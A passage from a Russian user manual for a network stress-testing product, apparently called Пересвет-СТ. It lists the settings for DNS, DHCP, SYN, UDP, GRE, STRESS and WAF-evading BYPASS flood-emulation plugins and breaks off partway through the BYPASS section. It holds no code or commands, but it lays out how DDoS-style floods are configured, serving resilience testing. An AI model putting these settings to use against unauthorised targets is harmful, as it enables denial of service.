Табл. 114б – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 114в;

Табл. 114в – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. Параметры плагина – параметры настроек плагина DNS Flood, описание которых указаны в Табл. 114г;

Табл. 114г – Параметры «Плагина»

НазваниеОписаниеЗначение
Невалидная чек-суммаЧек-сумма используется в IP-пакетах для проверки целостности данных. Установка невалидной чек-суммы означает, что отправляемые пакеты будут содержать неправильное значение чек-суммы, что может привести к тому, что получатель отвергнет эти пакеты или обработает их неправильно.Включение или выключение тумблера
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 114д;

Табл. 114д – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 114е.

Табл. 114е – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

DHCP Flood

DHCP Flood – плагин для генерации трафика, который генерирует и отправляет большое количество DHCP-запросов (DHCP Discover / DHCP Request) с целью исчерпать пул адресов DHCP-сервера или перегрузить пропускную способность сети.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 114ж;

Табл. 114ж – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 114з;

Табл. 114з – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 114и;

Табл. 114и – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. Параметры плагина – параметры настроек плагина DHCP Flood, описание которых указаны в Табл. 114к;

Табл. 114к – Параметры «Плагина»

НазваниеОписаниеЗначение
Невалидная чек-суммаЧек-сумма используется в IP-пакетах для проверки целостности данных. Установка невалидной чек-суммы означает, что отправляемые пакеты будут содержать неправильное значение чек-суммы, что может привести к тому, что получатель отвергнет эти пакеты или обработает их неправильно.Включение или выключение тумблера
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 114л;

Табл. 114л – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 114м.

Табл. 114м – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

MHDDoS Emulation

MHDDoS Emulation – плагин для эмуляции различных типов DDoS-атак с целью тестирования устойчивости и защиты сетевой инфраструктуры.

Данный плагин состоит из подплагинов ниже, которые можно включать при необходимости с пред настроенными параметрами.

SYN Flood

SYN Flood – подплагин для генерации трафика, в котором отправляется большое количество запросов на установление TCP-соединения (SYN-пакеты) без завершения процесса.

Данный плагин состоит из следующих параметров:

  1. Тумблер «Активировать подплагин» - для включения подплагина в рамках плагина «MHDDoS Emulation».

  2. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 115;

Табл. 115 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 116;

Табл. 116 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 117;

Табл. 117 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 118;

Табл. 118 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачиЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 119;

Табл. 119 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить По умолчанию, тумблер включен.
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение По умолчанию выставлено значение: 10.
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение

UDP Flood

UDP Flood – подплагин для генерации трафика, который отправляет большой объем UDP-пакетов на целевой сервер, что может привести к исчерпанию пропускной способности и перегрузке ресурсов сервера.

Данный плагин состоит из следующих параметров:

  1. Тумблер «Активировать подплагин» - для включения подплагина в рамках плагина «MHDDoS Emulation».

  2. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 120;

Табл. 120 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 121;

Табл. 121 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 122;

Табл. 122 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. Параметры плагина – параметры настроек плагина UDP, описание которых указаны в Табл. 123.

Табл. 123 – Параметры «Плагина»

НазваниеОписаниеЗначение
Невалидная чек-суммаЧек-сумма используется в UDP-пакетах для проверки целостности данных. Установка невалидной чек-суммы означает, что отправляемые пакеты будут содержать неправильное значение чек-суммы, что может привести к тому, что получатель отвергнет эти пакеты или обработает их неправильно.Включение или выключение тумблера
Отправлять пейлоадПейлоад — это данные, которые передаются в UDP-пакете. В данном случае параметр указывает на необходимость отправки пейлоада вместе с UDP-пакетомПо умолчанию, тумблер включен
Случайные данныеЭтот параметр подразумевает, что содержимое пейлоада будет генерироваться случайным образом. Это может включать случайные байты или строки, что делает трафик менее предсказуемым.По умолчанию, тумблер включен.
Размер пейлоадаЭтот параметр определяет размер данных в пейлоаде UDP-пакета. Значение может варьироваться от 0 до 1300 байт.По умолчанию, значение указано: «1024»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 124;

Табл. 124 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить По умолчанию, тумблер включен.
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение По умолчанию выставлено значение: 10.
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение

GRE Flood

GRE Flood – плагин для генерации трафика, который генерирует и отправляет большое количество пакетов с заголовком GRE (Generic Routing Encapsulation) с целью перегрузить пропускную способность сети.

Данный плагин состоит из следующих параметров:

  1. Тумблер «Активировать подплагин» - для включения подплагина в рамках плагина «MHDDoS Emulation».

  2. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 125;

Табл. 125 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 126;

Табл. 126 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 127;

Табл. 127 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. Параметры плагина – параметры настроек плагина GRE, описание которых указаны в Табл. 127а;

Табл. 127а – Параметры «Плагина»

НазваниеОписаниеЗначение
Невалидная чек-суммаЧек-сумма используется в IP-пакетах для проверки целостности данных. Установка невалидной чек-суммы означает, что отправляемые пакеты будут содержать неправильное значение чек-суммы, что может привести к тому, что получатель отвергнет эти пакеты или обработает их неправильно.Включение или выключение тумблера
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 128;

Табл. 128 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить По умолчанию, тумблер включен.
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение По умолчанию выставлено значение: 10.
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение

STRESS

STRESS – подплагин для генерации трафика, комбинирующий различные типы нагрузок для максимального воздействия на систему.

Данный плагин состоит из следующих параметров:

  1. Тумблер «Активировать подплагин» - для включения подплагина в рамках плагина «MHDDoS Emulation».

  2. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 129;

Табл. 129 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 130;

Табл. 130 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 131;

Табл. 131 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 132;

Табл. 132 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
  1. Параметры HTTP - параметры настроек HTTP заголовков на уровне L6-L7 TPC/IP, описание которых указано в Табл. 133;

Табл. 133 – Параметры «Параметры HTTP»

НазваниеОписаниеЗначение
HTTPsУказывает, используется ли защищенный протокол передачи данных HTTPSДа / Нет (укажите текущее состояние переключателем тумблера)
Версия TLSВерсия TLS (Transport Layer Security) определяет протокол шифрования, используемый для обеспечения безопасной передачи данных между клиентом и сервером Параметр доступен, если параметр HTTPs включенвыберите значение TLS v1.2 или TLS v1.3
Версия HTTPУказывает версию протокола HTTP, используемую для передачи данных.выберите значение HTTP 1.1 или HTTP 2.0
User-AgentЗаголовок, который идентифицирует клиентское приложение (например, браузер) и операционную систему, с которой осуществляется запрос.Введите значение заголовка: по умолчанию, ${userAgent} - Обеспечивает ротацию User-Agent: для каждого запроса выбирается случайный валидный вариант из списка в веб-интерфейсе
ПутьУказывает путь к запрашиваемому ресурсу на сервере. Это часть URL, которая следует за доменным именем.Введите значение пути (по умолчанию, значение пути является корневая директория сервера: «/»)
HTTP методМетод, используемый для запроса ресурса на сервере.По умолчанию, задано значение «POST»
HTTP статусОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы содержащие код ответа 3ХХ будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «location»Включить/выключить тумблер
HTML Meta RefreshОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы, содержащие в ответе HTML страницу с meta-тегом «refresh» будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «content», включая задержкуВключить/выключить тумблер
ГлубинаЗначение максимально допустимого количества переадресаций в рамках одной TCP сессииЗадайте свое значение (по умолчанию, значение равно «20»)
Query параметрыПараметры, передаваемые в URL после знака вопроса (?)Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
Тело запросаЧасть HTTP-запроса, содержащая данные, которые клиент отправляет серверу (например, форму или JSON) Параметр доступен если выбраны методы: POST, PUT или PATCHПо умолчанию, задано значение «{«data»: «${str(512)}»}»
ЗаголовкиДополнительные метаданные, отправляемые вместе с HTTP-запросом.Значения по умолчанию: «Accept»:« */*»; «Accept-Encoding»:« gzip,deflate,br»; «Accept-Language»:«ru-RU,ru;q=0.9,en-US,en;q=0.7»; «Cache-Control»:«max-age=0»; «Sec-Fetch-Mode»:«navigate»; «Sec-Fetch-Site»:«same-origin»; «Sec-Fetch-User»:«71»; «Sec-Fetch-Dest»:«document»; «Pragma»:«no-cache»; «X-Requested-With»:«XMLHttpRequest»; «Content-Type»:«application/json»; Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
  1. Параметры сессии - параметры, касающиеся управления сессиями в рамках текущего плагина, описание которых указано в Табл. 134;

Табл. 134 – Параметры «Параметры сессии»

НазваниеОписаниеЗначение
Общее количество сессийМаксимальное количество одновременно активных сессий, которые могут быть установлены в рамках плагина.Задайте числовое значение Значение по умолчанию: «10»
Тайм-аут повторного подключенияВремя в секундах, в течение которого Пересвет-СТ будет пытаться восстановить соединение после его разрыва. Если соединение не будет восстановлено в указанный период, сессия будет закрыта.Задайте числовое значение Значение по умолчанию: «0»
Подключений в секундуМаксимальное количество новых сессий, которые могут быть установлены за одну секунду.Задайте числовое значение Значение по умолчанию: «1»
Макс. стримов (на сессию)Максимальное количество потоков данных, которые могут быть активны в одной сессии. Параметр доступен только при включении H2 в «Параметрах HTTP».Задайте числовое значение Значение по умолчанию: «20»
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить По умолчанию, тумблер включен.
Запросов в секунду (на сессию)Максимальное количество запросов, которые могут быть обработаны в секунду для одной сессии/стрима.Задайте числовое значение По умолчанию выставлено значение: 10.
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение Значение по умолчанию: «0»

BYPASS

BYPASS – подплагин для генерации трафика, направленный на обход стандартных мер защиты (например, фильтров или WAF).

Данный плагин состоит из следующих параметров:

  1. Тумблер «Активировать подплагин» - для включения подплагина в рамках плагина «MHDDoS Emulation».

  2. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 135;

Табл. 135 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 136;

Табл. 136 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
